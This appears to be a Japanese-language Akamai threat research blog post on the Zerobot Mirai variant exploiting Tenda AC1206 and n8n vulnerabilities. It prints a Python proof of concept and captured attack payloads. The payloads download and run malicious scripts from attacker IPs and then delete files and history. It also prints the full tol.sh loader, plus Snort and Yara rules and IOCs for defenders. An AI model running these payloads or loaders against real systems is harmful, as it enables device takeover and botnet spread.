Zerobot マルウェアが n8n の自動化プラットフォームを標的に

Feb 27, 2026

執筆者

Kyle Lefton は、Akamai の Security Intelligence Response Team のセキュリティリサーチャーです。以前は国防総省の情報アナリストとして、サイバー防衛、脅威リサーチ、防諜の分野で数年にわたって経験を積んできました。新たな脅威のリサーチ、脆弱性の研究、脅威グループのマッピングに誇りをもって取り組んでいます。友人や家族と過ごす時間、戦略ゲーム、アウトドアでのハイキングが、オフの時間の楽しみです。

エグゼクティブサマリー

Akamai Security Intelligence and Response Team（SIRT）では、Tenda AC1206 ルーターと n8n 自動化プラットフォームにおけるコマンドインジェクションの脆弱性（CVE-2025-7544、CVE-2025-68613）が活発に悪用されていることを確認しました。
SIRT では、2026 年 1 月にハニーポットのグローバルネットワークでこの活動を最初に特定しました。これらの脆弱性の悪用が活発化しているという報告は、2025 年 7 月と 12 月に初めて公開されて以来です。
このブログ記事では、脅威の痕跡（IOC）のリストも確認できます。この脅威に対する防御にお役立てください。

IOC にジャンプする

概要

Akamai SIRT は、Tenda AC1206 ルーターや n8n ワークフロー自動化プラットフォームに影響を与えるものなど、最近のさまざまな CVE を標的とした、Zerobot と呼ばれる Mirai ベースのマルウェアキャンペーンを発見しました。このボットネットキャンペーンは、少なくとも 2025 年 12 月初旬にさかのぼります。最近の攻撃は、2026 年 1 月中旬に Akamai のハニーポットのグローバルネットワークで特定され、Mirai マルウェアのバリアントを拡散しました。

特に興味深いのは、n8n の脆弱性を標的にすることです。ボットネットは通常、セキュリティカメラ、DVR、ルーターなどのモノのインターネット（IoT）デバイスを悪用しますが、n8n は完全に異なるカテゴリーに分類されます。

これはボットネットにとって完全に新しいふるまいではありませんが、この種のターゲティングにより、組織はより重要なインフラを侵害される危険性が高くなります。これは、n8n の悪用によって脅威アクターがラテラルムーブメント（横方向の移動）を行えるようになる可能性があるためです。

標的となった脆弱性

SIRT の観測によると、Zerobot は 2 つの異なる脆弱性を標的としています。それは、CVE-2025-7544 と CVE-2025-68613 です。Akamai のハニーポットにおける攻撃試行のタイムスタンプは CVE 公開後であり、これらの脆弱性がゼロデイではないことが確認されました。

脅威アクターが機に乗じて、公開されたばかりの脆弱性を悪用することは、最近では非常に一般的です。抜け目なくパッチを適用している組織であっても、最初の開示後には脆弱な期間が発生することが多く、これらのデバイスへのパッチ適用を怠っている組織もあります。

CVE-2025-7544 の詳細

2025 年 7 月中旬に公開された CVE-2025-7544 は、バージョン 15.03.06.23 の Tenda AC1206 デバイスの /goform/setMacFilterCfg エンドポイントに影響を与えるリモートスタックベースのバッファオーバーフローであり、重大な脆弱性と評価されており、deviceList パラメーターを介して悪用される可能性があります。関数 parse_macfilter_rule により、変数 s（厳密には v3）が長さのチェックなしで strcpy 関数に渡され、スタックベースのバッファ先（s_2）がオーバーフローする可能性があります。

攻撃者は、ページをリクエストすることで、たとえリモートであっても、サービス妨害（DoS）攻撃やリモートコード実行（RCE）を簡単に行えます。こちらに概念実証（PoC）が公開されており、脆弱性と悪用の詳細が記載されています（図 1）。

import requests
ip = "192.168.0.1"
url = "http://" + ip + "/goform/setMacFilterCfg"
data = {
    "macFilterType": "white",
    "deviceList": "a" * 1000 + "\r" + "b" * 1000
}
response = requests.get(url, params=data)
print(response.text)

図 1：CVE-2025-7544 の悪用の PoC

CVE-2025-68613 の詳細

2025 年 12 月中旬に公開された CVE-2025-68613 は、n8n ワークフロー自動化プラットフォーム（バージョン 0.211.0～1.20.4、1.21.1、1.22.0）のワークフロー式評価システムに影響を与える RCE の脆弱性であり、重大と評価されました。

n8n では、ユーザーはワークフローに式を記述してデータを動的に処理することができますが、この式は適切なサンドボックスで評価されていませんでした。これにより、攻撃者は意図した実行コンテキストから抜け出してサーバー上で任意のコードを実行できます。攻撃者は、基盤となるシステムでこの式を実行することで、サーバー上のファイルの読み取りと書き込み、API キーなどの環境変数の窃取、永続化を行うことができます。

この脆弱性はかなり簡単に悪用でき、必要なのは管理者権限のないユーザーログインのみであり、n8n がアクセスできるすべてのデータにアクセスできます。多くの組織は、データベースとクラウドサービスの統合、データ処理の自動化、機微な情報の管理、さまざまなプラットフォームや内部システムの接続など、多様な目的で n8n を使用します。この脆弱性についても、こちらに PoC が公開されています。

Tenda と n8n の活発な悪用

Akamai SIRT は、2026 年 1 月中旬から自社のハニーポットのグローバルネットワークで Zerobot による CVE-2025-7544 の悪用が活発に試みられていることを発見しました。図 2 に示すように、この攻撃試行は deviceList パラメーターの 500 個の「A」の文字を使用してバッファオーバーフローを引き起こし、任意のコードを実行できるようにします。この攻撃は、米国ベースの IP アドレス 144.172.100.228 から tol.sh という悪性のシェルスクリプトをダウンロードして実行します。

/goform/setMacFilterCfg

macFilterType=black&deviceList=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod 777 /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/tol.sh; curl -O http://144.172.100[.]228/tol.sh; chmod 777 tol.sh; sh tol.sh; tftp 140.233.190.96 -c get tol.sh; chmod 777 tol.sh; sh tol.sh; tftp -r 3.sh -g 140.233.190.96; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 140.233.190.96 2.sh 2.sh; sh 2.sh; rm -rf tol.sh tol.sh 3.sh 2.sh; rm -rf *; history -c

図 2：CVE-2025-7544 の活発な悪用の例

また、SIRT は、Zerobot が、新たな n8n の脆弱性の 1 つであるCVE-2025-68613 の悪用を試みていることを観測しました（図 3）。この機能は、もう一方の攻撃とほぼ同様に、tol.sh シェルスクリプトをダウンロードして実行し、zerobotv9 のメインの Mirai マルウェアペイロードをフェッチしてロードします。

/rest/workflow/run

{"workflowData":{"nodes":[{"parameters":{"command":"cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod 777 /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/tol.sh; curl -O http://144.172.100[.]228/tol.sh; chmod 777 tol.sh; sh tol.sh; tftp 140.233.190.96 -c get tol.sh; chmod 777 tol.sh; sh tol.sh; tftp -r 3.sh -g 140.233.190.96; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 140.233.190.96 2.sh 2.sh; sh 2.sh; rm -rf tol.sh tol.sh 3.sh 2.sh; rm -rf *; history -c"},"name":"Exec","type":"n8n-nodes-base.executeCommand","typeVersion":1,"position":[100,100]}],"connections":{}}}

図 3：CVE-2025-68613 の活発な悪用の例

Mirai ベースのボットネットが n8n を標的とするのは前例がないわけではありませんが、これはよくある IoT デバイスの悪用とは大きく異なります。組織の重要なインフラでボットネットがアクセスと永続性を獲得し、さらにはラテラルムーブメント（横方向の移動）を行う可能性があることは、紛れもなく懸念材料です。

Zerobot ボットネット

図 4 のシェルスクリプトは、zerobotv9 という、Mirai ベースのマルウェアのメインペイロードをフェッチして実行します。これは、Mirai ダウンローダーでは一般的な、さまざまなアーキテクチャをサポートしています。この UPX パックペイロードには、ハードコードされた 0bot.qzz[.]io のコマンド & コントロールドメインや、一般的な Mirai マルウェアコンソール実行文字列（この場合は「bruh why again」）など、さまざまな暗号化された文字列とパラメーターがあります。

Zerobot という名称は、2022 年の Fortinet の記事までさかのぼりますが、関与する脅威アクターが関連しているかどうかは不明です。命名方法から、これは Zerobot マルウェアの 9 番目のバージョンであることが分かりますが、他の 8 つのバージョンはまだ確認されていません。

2022 年の最初の発見とは別に、2025 年 8 月には zerobotv2 という名前の公開マルウェアサンプルが見つかりましたが、これは一般的に使用されている LZRD Mirai マルウェアのバリアントのようです。

#!/bin/bash

ulimit -n 1024
cp /bin/busybox /tmp/
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86; chmod +x *; ./zerobotv9.x86 zerobotv9.x86; rm -rf zerobotv9.x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mips; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mips; chmod +x *; ./zerobotv9.mips zerobotv9.mips; rm -rf zerobotv9.mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arc; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arc; chmod +x *; ./zerobotv9.arc zerobotv9.arc; rm -rf zerobotv9.arc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.i686; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.i686; chmod +x *; ./zerobotv9.i686 zerobotv9.i686; rm -rf zerobotv9.i686
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86_64; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86_64; chmod +x *; ./zerobotv9.x86_64 zerobotv9.x86_64; rm -rf zerobotv9.x86_64
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mpsl; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mpsl; chmod +x *; ./zerobotv9.mpsl zerobotv9.mpsl; rm -rf zerobotv9.mpsl
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm; chmod +x *; ./zerobotv9.arm zerobotv9.arm; rm -rf zerobotv9.arm
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm5; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm5; chmod +x *; ./zerobotv9.arm5 zerobotv9.arm5; rm -rf zerobotv9.arm5
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm6; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm6; chmod +x *; ./zerobotv9.arm6 zerobotv9.arm6; rm -rf zerobotv9.arm6
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm7; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm7; chmod +x *; ./zerobotv9.arm7 zerobotv9.arm7; rm -rf zerobotv9.arm7
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.ppc; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.ppc; chmod +x *; ./zerobotv9.ppc zerobotv9.ppc; rm -rf zerobotv9.ppc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.spc; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.spc; chmod +x *; ./zerobotv9.spc zerobotv9.spc; rm -rf zerobotv9.spc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.m68k; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.m68k; chmod +x *; ./zerobotv9.m68k zerobotv9.m68k; rm -rf zerobotv9.m68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.sh4; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.sh4; chmod +x *; ./zerobotv9.sh4 zerobotv9.sh4; rm -rf zerobotv9.sh4

図 4：tol.sh の内容

元の 2022 年の Zerobot マルウェアと新しい Zerobotv9 のサンプルには、さまざまな違いがあります。最も顕著な違いは、元はファイルのサイズがはるかに大きく、Go で書かれている点です。Zerobotv9 は小さく、Go で書かれていません。

しかし、2022 年 10 月の元のダウンローダー IP アドレスから、Go で書かれていない、Zerobot と見なされるサンプルがいくつか見つかりました。この 2022 年 10 月のバリアントと Zerobotv9 の両方で、同じオリジナルの Mirai マルウェア XOR キーである 0XDEADBEEF（0x22）が使用されています。

また、この新しいバージョンには、TCPXmas、Mixamp、SSH、および Discord という名前の攻撃手法など、古いバージョンにはなかったさまざまな攻撃機能があります。ハードコードされた User-Agent を図 5 に示します。

Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; Info Path.3; SV1; .NET CLR 3.4.53360; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94

図 5：復号された Zerobotv9 マルウェアから抜粋した、ハードコードされた User-Agent

さらなる悪用

このブログ記事のハイライトは Tenda デバイスと n8n プラットフォームが活発に悪用されていることがですが、SIRT は、CVE-2017-9841（図 6）、CVE-2021-3129（図 7）、CVE-2022-22947（図 8）など、他のいくつかの脆弱性を標的とする Zerobot も観測しました。

これらの攻撃は、netcat と socat を使用して Raw TCP 接続を開き、ソケットから stdout にデータを読み取り、その後メインの Mirai マルウェアペイロードにロードするためにスクリプト実行コマンドを実行するため、この記事で注目した攻撃試行とは少し異なります。

脅威アクターは n8n と Tenda の脆弱性に対してもこの手法を使用しており、Perl ソケット、Bash TCP リダイレクト、PHP ソケット、Python ソケットなど、さまざまな予備があります。この手法は 2025 年 12 月初旬に初めて使用され、2026 年 1 月に curl や wget などのツールに切り替わりました。

結論

Mirai ベースのボットネットのセットアップは侵入の障壁がかなり低いため、最近、法執行機関によるいくつかのテイクダウンが注目を集めたにもかかわらず、残念ながら Mirai の拡散は続いています。簡単に金銭を得られることや単なるスリルに引かれた比較的経験の浅い脅威アクターが、古い Mirai コードを少し変更して容易に再利用でき、AI ツールを使用して繰り返すこともできます。

最近公開された CVE や、一部の組織がアップグレードを怠っている古いハードウェアを標的にするのが非常に効果的であるため、ゼロデイ攻撃を生み出すための研究開発も必要ありません。これは Aisuru のような悪名高い大規模なボットネットにはならないかもしれませんが、オペレーターはある程度の利益を得ることができ、より簡単に潜伏できます。

開示は実質的に利益

過去のレポートで述べたとおり、CVE プログラムは、それがなければ脅威アクターに気付かれなかったかもしれない脆弱性に光を当てるため、両刃の剣となることがあります。それでもこのプログラムは産業界にとって実質的にメリットになると Akamai は考えていますが、脅威アクターは組織が効果的にパッチを適用できるようになる前に悪用の機会を見つけるためにこのような開示を監視していることが一般的であることを考慮することが重要です。

ZeroBot が悪用した Tenda と n8n の脆弱性の両方について、攻撃の PoC が公開されているため、活発な攻撃が飛躍的に容易になり、拡散する可能性があります。特に、組織が n8n をより重要なワークフローで使用することがあることを考慮すると、影響を受ける可能性のある組織は、この脆弱性やその他の悪性のアクティビティから保護するために、できるだけ早くシステムのセキュリティを確保し、パッチを適用することが強く推奨されます。

IOC

Snort ルールおよび Yara ルールと併せて、IOC のリストを確認できます。防御担当者のサポートにお役立てください。

悪性 IP の Snort ルール

alert ip any any -> [140.233.190.96, 144.172.100.228, 172.86.123.179, 216.126.227.101, 103.59.160.237] any (
    msg:"Possible Botnet Infrastructure Activity - Suspicious IP"; 
    sid:2000003; 
    rev:1; 
    threshold:type limit, track by_src, count 1, seconds 600; 
    classtype:trojan-activity; 
    metadata:service http, malware;
)

C2 ドメイン解決検知のための Snort ルール

alert http any any -> [0bot.qzz.io, andro.notemacro.com, pivot.notemacro.com] any (
    msg:"Possible Botnet C2 or Malware Distribution - Suspicious Domain"; 
    sid:2000002; rev:1; 
    classtype:trojan-activity; 
    metadata:service http, malware;
)

マルウェアサンプルの Yara ルール

rule Mirai_Malware_IOCs_1
{
    meta:
        description = "Detects files containing IOCs associated with potential Mirai malware"
        author = "Akamai SIRT"
        date = "2026-01-29"
        source = "Akamai SIRT"
        malware_family = "Mirai"
        version = "1.0"

    strings:
        $bruh = "bruh why again"
        $url1 = "mamakmukekkontol"
        $url2 = "inihiddenngentod"

        $ip1 = "140.233.190.96"
        $ip2 = "144.172.100.228"
        $ip3 = "172.86.123.179"
        $ip4 = "216.126.227.101"
        $ip5 = "103.59.160.237"

        $domain1 = "0bot.qzz.io"
        $domain2 = "andro.notemacro.com"
        $domain3 = “pivot.notemacro.com”

        $hash1 = "c8e8b627398ece071a3a148d6f38e46763dc534f9bfd967ebc8ac3479540111f"
        $hash2 = "360467c3b733513c922b90d0e222067509df6481636926fa1786d0273169f4da"
        $hash3 = "cc1efbca0da739b7784d833e56a22063ec4719cd095b16e3e10f77efd4277e24"
        $hash4 = "045a1e42cb64e4aa91601f65a80ec5bd040ea4024c6d3b051cb1a6aa15d03b57"
        $hash5 = "d024039824db6fe535ddd51bc81099c946871e4e280c48ed6e90dada79ccfcc7"
        $hash6 = "deb70af83a9b3bb8f9424b709c3f6342d0c63aa10e7f8df43dd7a457bda8f060"
        $hash7 = "6e4e797262c80b9117aded5d25ff2752cd83abe631096b66e120cc3599a82e4e"
        $hash8 = "2fdb2a092f71e4eba2a114364dc8044a7aa7f78b32658735c5375bf1e4e8ece3"
        $hash9 = "263a363e2483bf9fd9f915527f5b5255daa42bbfa1e606403169575d6555a58c"
        $hash10 = "d7112dd3220ccb0b3e757b006acf9b92af466a285bbb0674258bcc9ad463f616"

    condition:
        (
            $url1 or
            $url2 or
            $ip1 or
            $ip2 or
            $ip3 or
            $ip4 or
            $ip5 or
            $domain1 or
            $domain2 or
            $domain3 or
            $hash1 or
            $hash2 or
            $hash3 or
            $hash4 or
            $hash5 or
            $hash6 or
            $hash7 or
            $hash8 or
            $hash9 or
            $hash10
        )
}

悪性 IPv4 アドレス

103.59.160.237

140.233.190.96

144.172.100.228

172.86.123.179

216.126.227.101

悪性ドメイン

0bot.qzz.io

andro.notemacro[.]com/inihiddenngentod/zerobotv9.*

pivot.notemacro.com/inihiddenngentod/zerobotv9.*

SHA256 ハッシュ

c8e8b627398ece071a3a148d6f38e46763dc534f9bfd967ebc8ac3479540111f

360467c3b733513c922b90d0e222067509df6481636926fa1786d0273169f4da

cc1efbca0da739b7784d833e56a22063ec4719cd095b16e3e10f77efd4277e24

045a1e42cb64e4aa91601f65a80ec5bd040ea4024c6d3b051cb1a6aa15d03b57

d024039824db6fe535ddd51bc81099c946871e4e280c48ed6e90dada79ccfcc7

deb70af83a9b3bb8f9424b709c3f6342d0c63aa10e7f8df43dd7a457bda8f060

6e4e797262c80b9117aded5d25ff2752cd83abe631096b66e120cc3599a82e4e

2fdb2a092f71e4eba2a114364dc8044a7aa7f78b32658735c5375bf1e4e8ece3

263a363e2483bf9fd9f915527f5b5255daa42bbfa1e606403169575d6555a58c

d7112dd3220ccb0b3e757b006acf9b92af466a285bbb0674258bcc9ad463f616

他の Mirai を見る